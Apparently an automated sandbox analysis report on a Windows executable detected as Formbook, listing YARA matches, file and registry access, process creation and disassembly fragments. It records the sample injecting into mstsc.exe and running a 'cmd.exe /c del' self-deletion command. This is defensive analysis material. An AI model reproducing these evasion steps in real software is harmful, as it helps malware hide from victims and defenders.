          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/1@6/3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JFBlvEr5H9.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_01
          Source: JFBlvEr5H9.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\mstsc.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\mstsc.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: JFBlvEr5H9.exe | Virustotal: Detection: 20%
          Source: JFBlvEr5H9.exe | ReversingLabs: Detection: 21%
          Source: unknown | Process created: C:\Users\user\Desktop\JFBlvEr5H9.exe 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Process created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Process created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: JFBlvEr5H9.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: JFBlvEr5H9.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: JFBlvEr5H9.exe | Static file information: File size 1336832 > 1048576
          Source: JFBlvEr5H9.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x107000
          Source: JFBlvEr5H9.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054C9C6 push es; ret 0_2_0054CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054C976 push es; retf 0001h 0_2_0054C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054C976 push es; ret 0_2_0054CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054C976 push es; retn 0001h 0_2_0054CBA3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054B673 push es; iretd 0_2_0054C833
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054B673 push es; retf 0_2_0054C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054B673 push es; retf 0001h 0_2_0054C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054C836 push es; retf 0_2_0054C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054B6C0 push es; iretd 0_2_0054C833
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B2A2 push cs; ret 4_2_0041B2A3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B3F2 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B3FB push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B3A5 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B45C push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00415414 push esp; ret 4_2_00415416
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00414F46 push cs; ret 4_2_00414F47
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret 4_2_0041C1FF
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00415FC5 push ebp; ret 4_2_00415FC6
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7C836 push es; retf 4_2_00A7C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7C9C6 push es; ret 4_2_00A7CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7C976 push es; retf 0001h 4_2_00A7C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7C976 push es; ret 4_2_00A7CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7C976 push es; retn 0001h 4_2_00A7CBA3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7B673 push es; iretd 4_2_00A7C833
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7B673 push es; retf 4_2_00A7C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7B673 push es; retf 0001h 4_2_00A7C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7B6C0 push es; iretd 4_2_00A7C833
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B0D0D1 push ecx; ret 21_2_04B0D0E4
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070B2A2 push cs; ret 21_2_0070B2A3
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070B3F2 push eax; ret 21_2_0070B3F8
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070B3FB push eax; ret 21_2_0070B462
          Source: initial sample | Static PE information: section name: .text entropy: 6.91186053545